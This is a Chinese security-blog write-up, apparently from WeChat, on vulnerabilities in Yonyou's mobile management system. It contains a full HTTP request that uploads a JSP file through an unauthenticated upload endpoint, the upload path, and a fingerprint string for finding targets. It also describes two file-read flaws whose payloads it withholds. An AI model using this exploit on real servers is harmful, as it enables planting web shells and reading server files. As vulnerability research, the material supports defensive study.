Skip to content

Latest commit

 

History

History
118 lines (57 loc) · 4.08 KB

[Kokoxca安全]-2023-11-3-用友移动管理系统漏洞分析(在野).md

File metadata and controls

118 lines (57 loc) · 4.08 KB

用友移动管理系统漏洞分析(在野)

原创 Kokoxca安全 Kokoxca安全

Kokoxca安全

微信号 gh_b130bebc48f2

功能介绍 学习网络安全,渗透笔记,代码审计。

__发表于

收录于合集 #代码审计 8个

0x01免责声明

技术文章仅供参考学习,请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失,均由使用者本人负责。本文所提供的技术信息或代码工具仅供于学习,一切不良后果与文章作者无关。使用者应该遵守法律法规,并尊重他人的合法权益。

0x02 影响版本

用友-移动管理系统

指纹信息:app="用友-移动系统管理"

这个系统在外网用的不是特别多

0x03 漏洞复现

前段时间用友移动管理系统爆出来了一个文件上传漏洞,这个就不过多分析了。

数据包:

POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.serverConnection: closeContent-Length: 200  
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3Content-Disposition: form-data; name="downloadpath"; filename="test.jsp"Content-Type: application/msword  
test------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--

上传后的位置:

/maupload/apk/test.jsp

0x04 漏洞分析(0day在野)

  1. 任意文件读取漏洞(1)

之前的文章也都写过文件读取漏洞都要怎么审计,基本上老样子全局搜索一些常见的函数

sun.nio.ch.FileChannelImpljava.io.Fi/listFilesjava.io.FileIputStreamjava.io.FileOutputStreamjava.io.FileSystem/Win32FileSystem/WinNTFileSystem/UnixFileSystemsun.nio.fs.UnixFileSystemProvider/WindowsFileSystemProviderjava.io.RandomAccessFilesun.nio.fs.CopyFilesun.nio.fs.UnixChannelFactorysun.nio.fs.WindowsChannelFactoryjava.nio.channels.AsynchronousFileChannelFileUtil/IOUtilfilePath/download/deleteFile/move/getFilereadBufferedReader

分析源码发现doGet方法调用了doPost方法实际功能在doPost中实现,在往下走是从请求中获取文件名filename,针对获取的文件名进行编码处理,然后调用download下载,后面就是一些构造文件的绝对路径等等。

说简单点就是攻击者可以通过GET或POST请求filename,然后path被构造成一个绝对路径,路径中包含了提供的文件名。那么如果用户能够控制 filename参数,就可以通过构造payload来下载任意文件。(只是自己的理解有分析说错的地方大佬们担待担待)

漏洞复现:

可以成功读取web.xml文件

2.任意文件读取(2)

还有一处也是存在任意文件读取的审计思路和方法上面已经说过了,由于公网上未爆出来这些漏洞我也不太敢过多的在文章中分析源码,还请谅解。

漏洞复现

其实系统还存在其他漏洞这边不太方便发出来,就简单的水一篇文章写写任意文件读取漏洞吧。

想要获取文件读取payload可以关注公众号回复" yongyou "获取

预览时标签不可点

微信扫一扫
关注该公众号

轻触阅读原文

继续滑动看下一个

知道了

微信扫一扫
使用小程序

取消 允许

取消 允许

: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看